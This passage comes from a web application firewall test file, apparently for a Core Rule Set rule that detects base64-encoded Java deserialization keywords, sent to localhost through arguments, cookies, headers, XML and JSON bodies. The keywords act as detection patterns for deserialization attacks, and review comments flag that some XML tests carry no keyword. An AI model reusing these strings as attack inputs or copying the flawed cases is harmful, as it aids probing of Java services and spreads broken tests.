          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-282
    desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-283
    desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-284
    desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-285
    desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ, tests 286-296.
  # Presumably the same keyword at another base64 byte alignment - TODO confirm.
  - test_title: 944300-286
    desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-287
    desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-288
    desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-289
    desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-290
    desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): the body below has no keyword; see the XML note at the top.
  - test_title: 944300-291
    desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-292
    desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-293
    desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-294
    desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-295
    desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-296
    desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword d2hpbGVjbG9zdXJl, tests 297-307.
  # It base64-decodes to "whileclosure".
  - test_title: 944300-297
    desc: "Argument test includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=d2hpbGVjbG9zdXJl"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-298
    desc: "Argument name includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "d2hpbGVjbG9zdXJl=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-299
    desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=d2hpbGVjbG9zdXJl
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-300
    desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: d2hpbGVjbG9zdXJl=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-301
    desc: "Request header test includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: d2hpbGVjbG9zdXJl
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): the body below has no keyword; see the XML note at the top.
  - test_title: 944300-302
    desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-303
    desc: "XML element value includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "d2hpbGVjbG9zdXJl"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-304
    desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "d2hpbGVjbG9zdXJl"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-305
    desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=d2hpbGVjbG9zdXJl"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-306
    desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-307
    desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword HdoaWxlY2xvc3VyZQ, tests 308-318.
  # Presumably the same keyword at another base64 byte alignment - TODO confirm.
  - test_title: 944300-308
    desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=HdoaWxlY2xvc3VyZQ"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-309
    desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "HdoaWxlY2xvc3VyZQ=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-310
    desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=HdoaWxlY2xvc3VyZQ
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-311
    desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: HdoaWxlY2xvc3VyZQ=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-312
    desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: HdoaWxlY2xvc3VyZQ
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): the body below has no keyword; see the XML note at the top.
  - test_title: 944300-313
    desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-314
    desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "HdoaWxlY2xvc3VyZQ"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-315
    desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "HdoaWxlY2xvc3VyZQ"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-316
    desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=HdoaWxlY2xvc3VyZQ"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-317
    desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-318
    desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword B3aGlsZWNsb3N1cmU, tests 319-329.
  # Presumably the same keyword at another base64 byte alignment - TODO confirm.
  - test_title: 944300-319
    desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=B3aGlsZWNsb3N1cmU"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-320
    desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
